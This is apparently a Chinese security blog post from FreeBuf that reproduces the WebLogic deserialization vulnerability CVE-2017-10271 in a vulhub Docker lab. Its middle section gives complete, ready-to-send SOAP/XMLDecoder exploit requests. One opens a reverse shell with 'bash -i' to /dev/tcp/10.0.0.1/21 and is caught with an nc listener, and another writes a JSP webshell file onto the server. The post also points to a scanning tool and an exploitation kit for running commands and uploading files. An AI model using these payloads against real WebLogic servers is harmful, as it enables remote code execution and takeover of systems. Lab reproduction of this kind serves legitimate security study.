freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Weblogic反序列化漏洞复现与利用(CVE-2017-10271)
Weblogic反序列化漏洞复现与利用(CVE-2017-10271)
进击的HACK 2023-02-21 22:01:54 159665
所属地 上海

Weblogic反序列化漏洞复现与利用(CVE-2017-10271)

环境搭建

启动测试环境:

cd vulhub-master/weblogic/CVE-2017-10271
docker-compose up -d

等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。

漏洞探测

发现网站开放7001或者出现下面的图片时,说明存在weblogic

然后通过探测工具确定有无漏洞

https://github.com/rabbitmask/WeblogicScan

python WeblogicScan.py -u 192.168.183.136 -p 7001


漏洞复现

发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/10.0.0.1/21 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


成功获取shell:

nc -lvvp 21


写入webshell(访问:http://your-ip:7001/bea_wls_internal/test.jsp):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

漏洞利用

存在漏洞的版本

Weblogic < 10.3.6

采用工具LiqunKit_1.5.jar

java8

java -jar LiqunKit_1.5.jar

成功之后就可以选择后面的执行命令或文件上传进行进一步命令


成功写入文件


清理环境

docker-compose down -v

参考链接

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271


欢迎关注公众号:进击的HACK

1676988051_63f4ce9306f1af0e312ad.png!small?1676988051536




# 漏洞 # 渗透测试 # web安全 # 网络安全技术
本文为 进击的HACK 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
漏洞复现与利用
相关推荐
[张三的渗透日记]电气鼠靶场系统靶场walkthrough 原创
[张三的渗透日记]电气鼠靶场系统靶场walkthrough

Web安全

前言手上最近也没有什么有意思的洞可以记录,正好在群里看到了en0th师傅新写的靶场

雨下整夜

220995围观 2023-02-24

前端JS加密算法登录解密 原创
前端JS加密算法登录解密

Web安全

前言渗透测试过程中遇到web登录的时候,很多场景账号密码都是经过js加密之后再请求发送,request的post登录包中很明显可以看到use...

E1iauk

149238围观 2023-02-24

靶场项目编写实战
靶场项目编写实战

Web安全

电气鼠靶场系统包含了常见的漏洞案例,有提示和代码案例。初学者可以通过查询资料等方式通过关卡,在试炼的过程学习漏洞原理和代码审计。

en0th

147169围观  · 1收藏  · 11喜欢 2023-02-24

WEB漏洞-XSS
WEB漏洞-XSS

Web安全

XSS漏洞产生的主要原因是由于程序对输入和输入的控制不够严格,导致构建的恶意代码输入后,在前端浏览的时候被当作有效的代码解析执行从而产生危害...

ghdghd

174479围观  · 6收藏  · 9喜欢 2023-02-23

hack the box之Irked靶场练习 原创
hack the box之Irked靶场练习

Web安全

hack the box 之 irked靶场练习。

Wings_Up

122769围观 2023-02-23

进击的HACK LV.6
欢迎关注公众号:进击的HACK 坚持每日更新,一起变得更强。
  • 36 文章数
  • 49 关注者
nuclei介绍与持续更新的poc集合
2023-04-24
钓鱼前邮件收集
2023-04-10
红队实战 | cobaltstrike钉钉群上线提醒
2023-04-06